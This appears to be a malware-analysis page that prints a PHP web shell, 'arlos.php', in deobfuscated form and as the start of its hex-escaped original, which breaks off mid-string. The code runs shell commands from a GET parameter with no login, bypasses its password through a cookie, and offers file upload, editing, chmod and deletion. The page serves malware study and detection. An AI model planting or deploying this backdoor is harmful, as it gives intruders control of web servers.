PHP Malware Analysis

Back to list

Filename: arlos.php

Tags

URLs
Execution
  • system
Input
  • _GET
  • _POST
  • _FILES
Environment
  • set_time_limit
  • error_reporting
  • getcwd
Files
  • file_get_contents
  • file_put_contents
  • copy

Deobfuscated code

<?php

@error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$auth_pass = "07a046c046d6fd64c569ea48206e8bec";
function lp()
{
    ?>
<html><head><title>ArlosCrew</title><link href="https://fonts.googleapis.com/css?family=Iceland:400,700"rel="stylesheet"type="text/css"></head><body bgcolor="black"style="color:#fff"><center><br><h1><center><font face="Iceland"size="20">Adit<font color="red">X</font>ploiter<font color="red">'</font>s</font></center></h1><br><div><form action><input type="hidden"name="action"value="login"> <input type="password"name="pass"placeholder="         password"style="border-radius:10px"> <input type="submit"style="font-family:Iceland;margin-top:1px;width:70px;background:#000;color:red;border:2px solid #1abc9c;border-radius:10px"value="LogIn"></form><br></div><?php 
    echo system($_GET["cmd"]);
    ?>
</center><?php 
}
if (isset($_GET["action"])) {
    if ($_GET["action"] == "login") {
        setcookie("password", $_GET["pass"]);
        echo "<script>location='" . $_SERVER["PHP_SELF"] . "'</script>";
    } else {
        if ($_GET["action"] == "logout") {
            setcookie("password", '', -31104000);
            echo "<script>location='" . $_SERVER["PHP_SELF"] . "'</script>";
        }
    }
}
if (isset($_COOKIE["password"])) {
    if (md5($_COOKIE["password"]) == $auth_pass || $_COOKIE["L"] == "L") {
        if (get_magic_quotes_gpc()) {
            foreach ($_POST as $key => $value) {
                $_POST[$key] = stripslashes($value);
            }
        }
        function perms($file)
        {
            $perms = @fileperms($file);
            if (($perms & 49152) == 49152) {
                $info = "s";
            } elseif (($perms & 40960) == 40960) {
                $info = "l";
            } elseif (($perms & 32768) == 32768) {
                $info = "-";
            } elseif (($perms & 24576) == 24576) {
                $info = "b";
            } elseif (($perms & 16384) == 16384) {
                $info = "d";
            } elseif (($perms & 8192) == 8192) {
                $info = "c";
            } elseif (($perms & 4096) == 4096) {
                $info = "p";
            } else {
                $info = "u";
            }
            $info .= $perms & 256 ? "r" : "-";
            $info .= $perms & 128 ? "w" : "-";
            $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-");
            $info .= $perms & 32 ? "r" : "-";
            $info .= $perms & 16 ? "w" : "-";
            $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-");
            $info .= $perms & 4 ? "r" : "-";
            $info .= $perms & 2 ? "w" : "-";
            $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-");
            return $info;
        }
        echo "\n<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n\t<link href=\"https://fonts.googleapis.com/css?family=Iceland:400,700\" rel=\"stylesheet\" type=\"text/css\">\n<title>Mini Shell</title>\n<style>\nbody{\nfont-family: \"Iceland\", cursive;\nbackground-color: black;\ncolor:white;\n}\n#content tr:hover{\nbackground-color: #006c96;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: #006c96;\n}\ntable{\nborder: 1px #f70c0c dotted;\n}\na{\ncolor:white;\ntext-decoration: none;\n}\na:hover{\ncolor:red;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 2px #006c96 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n\t";
        ?>
<h1><center><font size="20">subang<font color="red">}{</font>ploit<font color="red">'</font>s</font></center></h1><?php 
        echo "\n<table width=\"700\" border=\"1\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Current Path : ";
        if (isset($_GET["path"])) {
            $path = $_GET["path"];
        } else {
            $path = getcwd();
        }
        $pathen = $path;
        $path = str_replace("\\", "/", $path);
        $paths = explode("/", $path);
        foreach ($paths as $id => $pat) {
            if ($pat == '' && $id == 0) {
                $a = true;
                echo "<a href=\"?path=\"/\"\">/</a>";
                continue;
            }
            if ($pat == '') {
                continue;
            }
            echo "<a href=\"?path=";
            $linkpath = '';
            for ($i = 0; $i <= $id; $i++) {
                $linkpath .= "{$paths[$i]}";
                if ($i != $id) {
                    $linkpath .= "/";
                }
            }
            echo $linkpath;
            echo "\">" . $pat . "</a>/";
        }
        echo "<font color=red>    [</font>";
        if (is_writable("{$path}/{$dir}")) {
            echo "<font color=\"green\">";
        } elseif (!is_readable("{$path}/{$dir}")) {
            echo "<font color=\"red\">";
        }
        echo perms("{$path}/{$dir}");
        echo "<font color=red>]</font>";
        echo "</td></tr><tr><td>";
        if (isset($_FILES["file"])) {
            if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) {
                echo "<font color=\"green\">Upload Success</font><br />";
            } else {
                echo "<font color=\"red\">Upload Failed</font><br />";
            }
        }
        echo "<form enctype=\"multipart/form-data\" method=\"POST\">\nFile Manager : <font color=\"cyan\"><input type=\"file\" name=\"file\" /></font>\n<input type=\"submit\" value=\"Upload\" />-----------------------------------------------------------------<a href=\"?\"><font color=\"green\"> Home</font></a>\n</form></table>";
        echo "<table width=\"600\" border=\"1\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"></tr></td>";
        echo "<tr><td>\n  ---------------------------------------------<font color=red>[</font><a href=\"?x=changepass\">Ubah Pass</a><font color=red>]</font>-----------<font color=red>[</font><a href=\"?action=logout\">LogOut</a><font color=red>]</font>---------------------------------------------\n</td></tr></table>";
        if (isset($_GET["filesrc"])) {
            echo "<br><center>File ---> ";
            echo $_GET["filesrc"];
            echo "</center><br>";
            echo "<center><textarea cols=80 rows=20 name=\"src\">" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</textarea><center>";
        } elseif (isset($_GET["option"]) && $_POST["opt"] != "delet") {
            echo "</table><br /><center>" . $_POST["path"] . "<br /><br />";
            if ($_POST["opt"] == "chmod") {
                if (isset($_POST["perm"])) {
                    if (chmod($_POST["path"], $_POST["perm"])) {
                        echo "<font color=\"green\">Success Change Permission</font><br />";
                    } else {
                        echo "<font color=\"red\">Failed Change Permission</font><br />";
                    }
                }
                echo "<form method=\"POST\">\n        Permission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "\" />\n        <input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n        <input type=\"hidden\" name=\"opt\" value=\"chmod\">\n        <input type=\"submit\" value=\"Go\" />\n        </form>";
            } elseif ($_POST["opt"] == "rename") {
                if (isset($_POST["newname"])) {
                    if (rename($_POST["path"], $path . "/" . $_POST["newname"])) {
                        echo "<font color=\"green\">Success</font><br />";
                    } else {
                        echo "<font color=\"red\">Failed</font><br />";
                    }
                    $_POST["name"] = $_POST["newname"];
                }
                echo "<form method=\"POST\">\n        New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"" . $_POST["name"] . "\" />\n        <input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n        <input type=\"hidden\" name=\"opt\" value=\"rename\">\n        <input type=\"submit\" value=\"Go\" />\n        </form>";
            } elseif ($_POST["opt"] == "edit") {
                if (isset($_POST["src"])) {
                    $fp = fopen($_POST["path"], "w");
                    if (fwrite($fp, $_POST["src"])) {
                        echo "<font color=\"green\">Success</font><br />";
                    } else {
                        echo "<font color=\"red\">Failed</font><br />";
                    }
                    fclose($fp);
                }
                echo "<form method=\"POST\">\n        <textarea cols=80 rows=20 name=\"src\">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />\n        <input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n        <input type=\"hidden\" name=\"opt\" value=\"edit\">\n        <input type=\"submit\" value=\"Go\" />\n        </form>";
            }
            echo "</center>";
        } else {
            echo "<br /><center>";
            if (isset($_GET["option"]) && $_POST["opt"] == "delet") {
                if ($_POST["type"] == "dir") {
                    if (rmdir($_POST["path"])) {
                        echo "<font color=\"green\">Success</font><br />";
                    } else {
                        echo "<font color=\"red\">Failed</font><br />";
                    }
                } elseif ($_POST["type"] == "file") {
                    if (unlink($_POST["path"])) {
                        echo "<font color=\"green\">Success</font><br />";
                    } else {
                        echo "<font color=\"red\">Failed</font><br />";
                    }
                }
            }
            echo "</center>";
            if (!isset($_GET["x"])) {
                $scandir = scandir($path);
                echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n    <tr class=\"first\">\n        <td><center><font color=\"red\">Dir</font></center></td>\n        <td><center><font color=\"red\">Size</font></center></td>\n        <td><center><font color=\"red\">Permissions</font></center></td>\n        <td><center><font color=\"red\">Setting</font></center></td>\n    </tr>";
                foreach ($scandir as $dir) {
                    if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") {
                        continue;
                    }
                    $dirlink = "{$path}/{$dir}";
                    echo "<tr>\n        <td><a href=\"?path={$dirlink}\">{$dir}</a></td>\n        <td><center>--</center></td>\n        <td><center>";
                    if (is_writable("{$path}/{$dir}")) {
                        echo "<font color=\"green\">";
                    } elseif (!is_readable("{$path}/{$dir}")) {
                        echo "<font color=\"red\">";
                    }
                    echo perms("{$path}/{$dir}");
                    if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                        echo "</font>";
                    }
                    echo "</center></td>\n        <td><center><form method=\"POST\" action=\"?option&path={$pathen}\">\n        <select name=\"opt\">\n\t    <option value=\"\">Select</option>\n        <option value=\"delet\">Delete</option>\n        <option value=\"chmod\">Chmod</option>\n        <option value=\"rename\">Rename</option>\n        </select>\n        <input type=\"hidden\" name=\"type\" value=\"dir\">\n        <input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n        <input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n        <input type=\"submit\" value=\">\" />\n        </form></center></td>\n        </tr>";
                }
                echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
                foreach ($scandir as $file) {
                    if (!is_file("{$path}/{$file}")) {
                        continue;
                    }
                    $size = filesize("{$path}/{$file}") / 1024;
                    $size = round($size, 3);
                    if ($size >= 1024) {
                        $size = round($size / 1024, 2) . " MB";
                    } else {
                        $size .= " KB";
                    }
                    $filelink = "{$path}/{$file}";
                    echo "<tr>\n        <td><a href=\"?filesrc={$filelink}&path={$pathen}\">{$file}</a></td>\n        <td><center>" . $size . "</center></td>\n        <td><center>";
                    if (is_writable("{$path}/{$file}")) {
                        echo "<font color=\"green\">";
                    } elseif (!is_readable("{$path}/{$file}")) {
                        echo "<font color=\"red\">";
                    }
                    echo perms("{$path}/{$file}");
                    if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                        echo "</font>";
                    }
                    echo "</center></td>\n        <td><center><form method=\"POST\" action=\"?option&path={$pathen}\">\n        <select name=\"opt\">\n\t    <option value=\"\">Select</option>\n        <option value=\"delet\">Delete</option>\n        <option value=\"chmod\">Chmod</option>\n        <option value=\"rename\">Rename</option>\n        <option value=\"edit\">Edite File</option>\n        </select>\n        <input type=\"hidden\" name=\"type\" value=\"file\">\n        <input type=\"hidden\" name=\"name\" value=\"{$file}\">\n        <input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n        <input type=\"submit\" value=\">\" />\n        </form></center></td>\n        </tr>";
                }
                echo "</table>\n    </div>";
            }
        }
        if (isset($_GET["x"]) && $_GET["x"] == "changepass") {
            function fgc($file)
            {
                return file_get_contents($file);
            }
            function changepass($plain)
            {
                $newpass = md5($plain);
                $newpass = "\$auth_pass = \"" . $newpass . "\";";
                $con = fgc($_SERVER["SCRIPT_FILENAME"]);
                $con = preg_replace("/\\\$auth_pass\\ *=\\ *[\"\\']*([a-fA-F0-9]*)[\"\\']*;/is", $newpass, $con);
                return file_put_contents($_SERVER["SCRIPT_FILENAME"], $con);
            }
            echo "<center><h1>Change Shell Password</h1></center>";
            echo "<center>";
            echo "<form action=\"\" method=post ><table>";
            echo "<tr><td>New Password</td><td> :  <input type=password name=pass1 style=\"border-radius:5px;\" /></td></tr>";
            echo "<tr><td>Confirm Password</td><td> :  <input type=password name=pass2 style=\"border-radius:5px;\" /></td></tr>";
            echo "<tr><td colspan=2><input type=submit value=submit name=L style=\"border-radius:5px;width:100%\"/></td></tr></table>";
            echo "</form>";
            if (isset($_POST["L"])) {
                if ($_POST["pass1"] == $_POST["pass2"]) {
                    if (changepass($_POST["pass1"])) {
                        echo "<script>alert(\"password change successfully\")</script>";
                    } else {
                        echo "<script>alert(\"password change failed\")</script>";
                    }
                } else {
                    echo "<script>alert(\"password not match\")</script>";
                }
            }
        }
        echo "\n</BODY>\n</HTML>";
    } else {
        lp();
    }
} else {
    echo lp();
}
?>
<center><br><font face="Iceland">copyright<font color="red">©</font>subang<font color="red">}{</font>ploit<font color="red">'</font>s</font><center></body></html>


Original code

<?php
@error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$auth_pass = "07a046c046d6fd64c569ea48206e8bec";
goto R0enV; hJ8rW: if (isset($_GET["\141\x63\x74\151\x6f\156"])) { if ($_GET["\x61\143\x74\x69\x6f\156"] == "\x6c\x6f\147\x69\x6e") { setcookie("\160\x61\x73\x73\167\157\162\x64", $_GET["\160\x61\163\x73"]); echo "\74\x73\143\162\151\160\x74\76\x6c\157\x63\141\x74\x69\157\156\x3d\47" . $_SERVER["\x50\110\x50\137\123\x45\114\x46"] . "\x27\x3c\57\x73\143\x72\151\160\164\x3e"; } else { if ($_GET["\x61\x63\164\x69\157\x6e"] == "\154\157\x67\x6f\x75\164") { setcookie("\160\x61\x73\163\167\157\162\x64", '', -86400 * 30 * 12); echo "\x3c\x73\x63\x72\x69\160\164\x3e\x6c\x6f\143\141\164\151\157\156\x3d\47" . $_SERVER["\120\x48\x50\x5f\x53\x45\114\x46"] . "\x27\x3c\x2f\x73\x63\162\x69\160\164\x3e"; } } } goto WG8Zt; R0enV: function lp() { ?>
<html><head><title>ArlosCrew</title><link href="https://fonts.googleapis.com/css?family=Iceland:400,700"rel="stylesheet"type="text/css"></head><body bgcolor="black"style="color:#fff"><center><br><h1><center><font face="Iceland"size="20">Adit<font color="red">X</font>ploiter<font color="red">'</font>s</font></center></h1><br><div><form action><input type="hidden"name="action"value="login"> <input type="password"name="pass"placeholder="         password"style="border-radius:10px"> <input type="submit"style="font-family:Iceland;margin-top:1px;width:70px;background:#000;color:red;border:2px solid #1abc9c;border-radius:10px"value="LogIn"></form><br></div><?php  echo system($_GET["\143\155\x64"]); ?>
</center><?php  } goto hJ8rW; WG8Zt: if (isset($_COOKIE["\160\141\x73\163\167\x6f\x72\144"])) { if (md5($_COOKIE["\160\x61\x73\x73\x77\x6f\162\144"]) == $auth_pass || $_COOKIE["\x4c"] == "\114") { if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } function perms($file) { $perms = @fileperms($file); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\144"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\x70"; } else { $info = "\165"; } $info .= $perms & 256 ? "\x72" : "\55"; $info .= $perms & 128 ? "\x77" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\163" : "\x78" : ($perms & 2048 ? "\x53" : "\55"); $info .= $perms & 32 ? "\x72" : "\55"; $info .= $perms & 16 ? "\x77" : "\x2d"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\x72" : "\x2d"; $info .= $perms & 2 ? "\167" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\170" : ($perms & 512 ? "\x54" : "\x2d"); return $info; } echo "\xa\74\41\x44\x4f\x43\124\x59\x50\105\x20\x48\124\115\x4c\76\xa\74\x48\124\115\114\x3e\xa\74\110\105\x41\104\x3e\xa\11\x3c\154\151\x6e\153\x20\x68\x72\x65\146\75\x22\x68\x74\x74\x70\163\x3a\57\57\146\157\x6e\164\163\x2e\147\157\157\x67\154\x65\141\160\151\163\x2e\143\157\x6d\57\143\x73\x73\x3f\146\141\155\151\x6c\x79\x3d\111\143\145\x6c\141\x6e\x64\72\x34\x30\60\54\x37\x30\x30\42\40\162\145\x6c\x3d\x22\x73\x74\x79\154\145\x73\x68\x65\x65\164\x22\x20\x74\171\160\x65\x3d\x22\164\145\x78\x74\57\143\x73\x73\42\76\12\74\164\151\x74\x6c\145\x3e\x4d\151\156\151\40\x53\x68\145\154\x6c\74\x2f\x74\151\164\154\145\x3e\12\x3c\163\164\171\x6c\x65\76\xa\142\x6f\x64\171\x7b\xa\x66\157\x6e\x74\55\x66\141\155\x69\154\x79\72\x20\x22\x49\143\145\x6c\x61\x6e\144\42\x2c\40\143\x75\x72\163\151\x76\x65\73\xa\142\141\143\153\147\162\157\165\x6e\x64\x2d\x63\157\154\x6f\162\72\40\x62\x6c\141\143\x6b\x3b\12\x63\x6f\x6c\x6f\x72\72\167\150\x69\x74\145\73\12\x7d\xa\43\143\157\156\164\x65\156\x74\40\x74\x72\x3a\x68\x6f\166\x65\x72\173\12\x62\x61\143\x6b\x67\x72\x6f\165\156\x64\55\143\157\154\x6f\162\72\40\43\60\x30\66\143\71\66\x3b\xa\x74\x65\x78\164\55\163\x68\x61\144\157\x77\x3a\x30\160\x78\x20\x30\x70\170\40\61\60\x70\x78\40\43\146\146\x66\73\12\175\xa\x23\x63\157\x6e\x74\x65\156\164\40\56\146\x69\162\x73\164\173\xa\142\x61\x63\153\147\x72\157\165\156\x64\x2d\x63\157\x6c\157\x72\72\40\x23\x30\60\x36\143\71\x36\73\12\x7d\xa\164\141\142\154\x65\x7b\xa\142\x6f\x72\144\145\x72\x3a\40\61\160\x78\40\43\146\67\60\x63\x30\x63\40\144\157\x74\164\x65\x64\x3b\xa\175\xa\x61\173\12\x63\x6f\154\157\162\72\167\150\x69\x74\x65\73\12\x74\145\170\164\x2d\144\x65\x63\x6f\x72\141\x74\x69\157\156\72\x20\x6e\x6f\156\x65\73\12\x7d\xa\x61\x3a\150\157\166\145\162\x7b\xa\x63\157\154\157\x72\x3a\162\145\144\x3b\xa\164\145\x78\x74\55\x73\x68\x61\x64\x6f\167\72\60\x70\170\x20\60\160\x78\40\61\60\x70\170\40\x23\x66\x66\146\x66\146\146\73\12\175\12\x69\x6e\x70\x75\164\x2c\163\145\x6c\x65\x63\x74\x2c\x74\145\x78\x74\141\x72\145\x61\x7b\12\x62\x6f\162\x64\145\162\72\x20\62\160\x78\x20\43\60\60\x36\143\71\x36\40\163\x6f\154\x69\144\73\12\x2d\155\x6f\172\x2d\x62\x6f\x72\144\145\162\55\x72\141\144\x69\x75\x73\72\x20\x35\x70\x78\x3b\12\x2d\167\x65\x62\x6b\151\x74\x2d\142\157\x72\x64\x65\162\55\162\141\x64\151\x75\163\72\x35\160\170\73\12\142\x6f\162\x64\145\x72\55\x72\x61\x64\x69\165\163\x3a\65\160\x78\73\xa\175\xa\74\x2f\x73\164\x79\154\x65\x3e\xa\x3c\x2f\110\105\101\x44\76\12\x3c\102\117\104\131\x3e\xa\11"; ?>
<h1><center><font size="20">subang<font color="red">}{</font>ploit<font color="red">'</font>s</font></center></h1><?php  echo "\xa\74\164\x61\142\x6c\x65\40\x77\x69\x64\x74\150\75\42\x37\60\60\x22\x20\142\x6f\162\x64\x65\162\x3d\x22\61\42\40\143\x65\154\x6c\160\x61\x64\x64\151\156\147\75\42\63\42\40\143\x65\154\154\x73\x70\x61\x63\151\156\x67\75\42\61\x22\40\x61\154\151\147\156\x3d\x22\x63\145\156\164\x65\x72\42\x3e\12\74\164\162\76\x3c\x74\x64\76\x43\x75\162\162\145\x6e\164\x20\x50\141\x74\150\x20\x3a\x20"; if (isset($_GET["\160\141\164\150"])) { $path = $_GET["\160\141\164\150"]; } else { $path = getcwd(); } $pathen = $path; $path = str_replace("\134", "\57", $path); $paths = explode("\x2f", $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\x3c\141\40\150\x72\x65\146\75\42\x3f\x70\x61\164\150\75\x22\57\42\42\x3e\x2f\74\x2f\x61\x3e"; continue; } if ($pat == '') { continue; } echo "\x3c\x61\x20\x68\162\145\x66\x3d\42\x3f\x70\141\164\150\x3d"; $linkpath = ''; for ($i = 0; $i <= $id; $i++) { $linkpath .= "{$paths[$i]}"; if ($i != $id) { $linkpath .= "\x2f"; } } echo $linkpath; echo "\x22\76" . $pat . "\x3c\57\x61\76\x2f"; } echo "\x3c\146\157\156\x74\x20\x63\157\154\x6f\x72\75\162\x65\144\76\40\40\40\x20\133\x3c\x2f\x66\157\x6e\x74\76"; if (is_writable("{$path}\57{$dir}")) { echo "\x3c\x66\157\x6e\164\40\x63\x6f\x6c\x6f\x72\x3d\42\x67\x72\145\145\156\42\x3e"; } elseif (!is_readable("{$path}\57{$dir}")) { echo "\x3c\x66\x6f\x6e\x74\x20\143\x6f\154\x6f\x72\x3d\x22\162\145\144\x22\76"; } echo perms("{$path}\x2f{$dir}"); echo "\74\146\x6f\x6e\164\x20\x63\157\x6c\157\162\75\x72\x65\144\76\x5d\x3c\x2f\146\x6f\x6e\x74\76"; echo "\74\x2f\164\x64\76\x3c\x2f\164\x72\x3e\x3c\164\x72\x3e\x3c\164\x64\76"; if (isset($_FILES["\146\151\154\x65"])) { if (copy($_FILES["\x66\151\x6c\145"]["\x74\x6d\160\x5f\x6e\x61\x6d\x65"], $path . "\57" . $_FILES["\x66\151\x6c\145"]["\x6e\141\x6d\145"])) { echo "\x3c\x66\x6f\x6e\164\40\x63\157\x6c\x6f\x72\x3d\42\147\162\x65\145\x6e\x22\76\x55\160\154\x6f\141\144\40\x53\x75\x63\143\145\x73\x73\x3c\x2f\146\157\156\164\x3e\x3c\142\162\x20\x2f\76"; } else { echo "\x3c\146\157\156\164\x20\143\157\x6c\x6f\x72\x3d\42\x72\x65\144\42\76\125\160\154\x6f\141\x64\x20\106\141\x69\x6c\145\144\74\57\146\x6f\x6e\164\76\x3c\142\162\x20\x2f\x3e"; } } echo "\74\x66\157\162\x6d\x20\x65\x6e\x63\164\171\x70\145\x3d\x22\155\165\154\164\x69\x70\x61\162\x74\57\x66\x6f\x72\x6d\55\x64\x61\164\x61\x22\40\155\x65\x74\150\157\144\75\x22\120\x4f\123\124\42\76\xa\106\151\x6c\x65\x20\x4d\x61\x6e\141\x67\x65\x72\x20\72\40\74\146\157\156\x74\40\143\x6f\x6c\x6f\x72\75\x22\143\x79\141\156\42\76\x3c\151\156\160\x75\164\40\164\171\x70\145\75\42\x66\x69\154\x65\42\x20\156\x61\155\145\x3d\x22\146\151\154\145\x22\40\x2f\x3e\74\57\x66\157\x6e\164\76\xa\74\151\x6e\160\165\164\40\164\171\x70\145\75\42\163\x75\142\155\151\164\42\40\x76\x61\154\x75\145\75\x22\x55\x70\x6c\157\141\x64\42\x20\57\76\x2d\55\x2d\55\55\55\55\x2d\55\x2d\55\x2d\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\55\55\x2d\x2d\55\55\55\x2d\55\55\x2d\x2d\x2d\x2d\55\55\x2d\55\x2d\55\55\x2d\55\55\55\x2d\55\x2d\55\x2d\55\x2d\x2d\x2d\55\x2d\55\x3c\141\x20\x68\x72\x65\x66\75\42\77\x22\76\74\x66\157\156\164\40\143\157\x6c\157\162\75\42\x67\162\x65\145\x6e\42\x3e\40\110\157\x6d\x65\74\x2f\146\157\156\x74\76\74\57\x61\x3e\xa\74\57\x66\x6f\162\x6d\x3e\x3c\57\164\141\x62\154\x65\76"; echo "\74\164\141\142\x6c\145\x20\x77\151\x64\x74\150\x3d\x22\x36\x30\60\42\x20\142\157\x72\x64\145\162\x3d\42\61\42\x20\x63\x65\154\x6c\160\141\144\144\151\156\x67\x3d\x22\x33\x22\40\x63\x65\x6c\x6c\163\160\141\x63\x69\x6e\147\75\42\61\42\40\x61\154\151\147\x6e\75\42\143\145\x6e\x74\145\162\x22\x3e\x3c\x2f\164\x72\x3e\74\57\x74\x64\76"; echo "\x3c\x74\162\x3e\74\x74\144\x3e\12\x20\40\55\55\x2d\55\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\55\55\55\x2d\55\55\55\x2d\55\x2d\x2d\x2d\55\55\55\x2d\55\55\55\x2d\x2d\55\55\55\55\x2d\55\x2d\x2d\55\55\55\x2d\74\146\157\156\x74\40\143\157\x6c\x6f\162\x3d\x72\x65\x64\x3e\x5b\x3c\57\x66\157\x6e\x74\x3e\x3c\x61\x20\x68\x72\145\x66\75\42\77\170\x3d\143\150\141\156\x67\x65\x70\x61\163\163\x22\76\125\142\141\x68\40\x50\x61\163\x73\74\x2f\141\x3e\74\x66\157\x6e\164\40\143\157\x6c\157\162\x3d\x72\145\144\76\135\74\57\x66\x6f\x6e\164\76\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\x2d\55\x3c\146\157\156\x74\40\x63\x6f\x6c\157\162\75\x72\145\144\x3e\133\x3c\x2f\146\x6f\156\x74\x3e\x3c\x61\40\x68\x72\x65\x66\x3d\x22\x3f\x61\143\x74\x69\157\x6e\x3d\154\157\x67\x6f\165\x74\x22\x3e\x4c\x6f\x67\117\165\164\74\x2f\x61\x3e\74\146\157\x6e\x74\40\143\x6f\x6c\157\x72\x3d\162\145\144\76\x5d\74\57\x66\157\156\x74\76\55\x2d\55\x2d\x2d\x2d\55\x2d\55\x2d\55\55\x2d\x2d\55\55\x2d\55\55\x2d\55\x2d\55\55\55\55\x2d\55\55\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\55\55\55\x2d\55\12\74\57\x74\x64\x3e\x3c\x2f\164\x72\76\x3c\57\164\x61\142\x6c\145\x3e"; if (isset($_GET["\146\x69\x6c\x65\163\162\143"])) { echo "\x3c\x62\x72\x3e\74\143\145\x6e\164\145\162\x3e\106\x69\154\145\x20\55\55\55\76\40"; echo $_GET["\x66\x69\154\145\x73\x72\x63"]; echo "\74\57\143\145\156\x74\x65\162\76\74\x62\x72\76"; echo "\74\143\x65\156\x74\145\x72\x3e\x3c\x74\x65\x78\x74\141\162\145\141\40\143\157\x6c\x73\75\x38\x30\x20\x72\x6f\167\163\75\62\60\x20\156\x61\x6d\x65\75\42\x73\162\143\42\76" . htmlspecialchars(file_get_contents($_GET["\x66\x69\x6c\x65\x73\162\x63"])) . "\74\57\x74\x65\x78\164\141\x72\x65\141\x3e\x3c\x63\x65\156\x74\145\x72\76"; } elseif (isset($_GET["\157\x70\x74\x69\157\x6e"]) && $_POST["\x6f\x70\164"] != "\144\x65\x6c\x65\x74") { echo "\74\57\x74\141\x62\154\x65\76\74\x62\x72\40\57\x3e\x3c\143\x65\156\164\145\162\x3e" . $_POST["\x70\x61\164\x68"] . "\74\142\162\40\x2f\76\x3c\x62\x72\x20\57\x3e"; if ($_POST["\157\160\164"] == "\x63\150\155\157\144") { if (isset($_POST["\160\145\x72\155"])) { if (chmod($_POST["\x70\141\x74\x68"], $_POST["\160\x65\x72\x6d"])) { echo "\x3c\x66\157\x6e\164\x20\143\157\154\x6f\x72\x3d\42\147\162\145\x65\156\x22\x3e\123\165\143\143\x65\163\163\x20\103\x68\x61\156\147\145\x20\120\145\162\155\x69\163\x73\151\157\156\x3c\x2f\x66\157\x6e\x74\76\x3c\142\162\40\x2f\76"; } else { echo "\74\x66\157\x6e\164\x20\x63\x6f\154\x6f\x72\75\42\162\x65\x64\x22\x3e\x46\141\151\x6c\145\x64\x20\x43\x68\x61\x6e\x67\x65\x20\x50\145\162\x6d\151\163\163\x69\x6f\156\x3c\57\146\157\x6e\x74\76\74\x62\x72\x20\57\76"; } } echo "\74\x66\157\162\155\40\x6d\145\x74\150\157\x64\x3d\42\120\117\x53\x54\42\x3e\12\40\40\x20\x20\x20\x20\40\40\120\145\x72\155\x69\x73\x73\151\x6f\156\40\72\40\74\x69\156\160\x75\164\x20\x6e\141\x6d\145\75\x22\160\145\x72\155\42\x20\164\x79\160\x65\x3d\x22\164\x65\x78\x74\x22\40\x73\x69\172\145\75\x22\x34\42\40\x76\141\x6c\x75\x65\75\42" . substr(sprintf("\45\x6f", fileperms($_POST["\x70\141\x74\x68"])), -4) . "\x22\40\x2f\x3e\xa\40\x20\x20\x20\40\40\x20\x20\74\x69\156\160\x75\164\x20\164\x79\x70\145\x3d\x22\150\151\x64\x64\x65\156\x22\x20\156\x61\x6d\x65\x3d\42\160\x61\164\x68\x22\x20\166\141\x6c\x75\145\x3d\x22" . $_POST["\160\141\164\x68"] . 